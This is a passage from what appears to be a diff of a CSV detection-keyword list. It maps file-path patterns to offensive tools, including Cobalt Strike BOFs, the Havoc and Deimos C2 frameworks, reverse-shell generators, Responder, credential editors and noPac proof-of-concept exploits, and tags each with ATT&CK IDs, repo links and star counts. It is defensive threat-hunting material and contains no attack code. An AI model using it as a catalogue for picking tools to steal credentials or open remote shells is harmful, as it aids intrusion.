T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Remote/office_tokens/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Remote/procdump/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Remote/ProcessDestroy/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Remote/ProcessListHandles/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Remote/schtaskscreate/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 
- T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Remote/schtasksrun/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Remote/setuserpass/","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 
- T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Remote/setuserpass/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider 
- APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Remote/unexpireuser/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/remote-method-guesser.git*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*/RemoteOps.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation 
command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*/remotereg.c*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*/remotereg.o*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*/remoteshell.py*","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" "*/resolveall.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/resources/PROCEXP.sys*","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1237","216","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" "*/resources/selfdestruction*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" -"*/Responder.git*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" -"*/responder/Responder.conf *","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*/Responder.git*","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*/responder/Responder.conf *","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*/Responder/Responder.conf*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*/Responder/Responder.conf*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" -"*/Responder-master.zip*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*/Responder-master.zip*","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*/returnvar/wce/*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" "*/rev_shell.py*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*/reverse-index.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/reverse-shell-generator*","offensive_tool_keyword","reverse-shell-generator","Hosted Reverse Shell generator with a ton of functionality","T1059 T1071","N/A","N/A","N/A","POST Exploitation tools","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","2271","510","2023-08-12T15:06:21Z","2021-02-27T00:53:13Z" +"*/reverse-shell-generator*","offensive_tool_keyword","reverse-shell-generator","Hosted Reverse Shell generator with a ton of functionality","T1059 T1071","N/A","N/A","N/A","POST Exploitation tools","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","2272","511","2023-08-12T15:06:21Z","2021-02-27T00:53:13Z" "*/rexec-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rfc868-time.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/RGPerson.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*/riak-http-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ricardojba/Invoke-noPac*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/ricardojba/Invoke-noPac","1","1","N/A","N/A","1","57","12","2023-02-16T10:45:19Z","2021-12-13T19:01:18Z" "*/ricardojba/noPac*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","1","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" -"*/rid_hijack.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/rid_hijack.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/ridenum/ridenum.py*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/Ridter/noPac*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","1","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*/rlogin-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rmi-dumpregistry.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rmi-vuln-classloader.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/ROADtools/*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1353","206","2023-09-27T08:30:55Z","2020-03-28T09:56:08Z" +"*/ROADtools/*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - 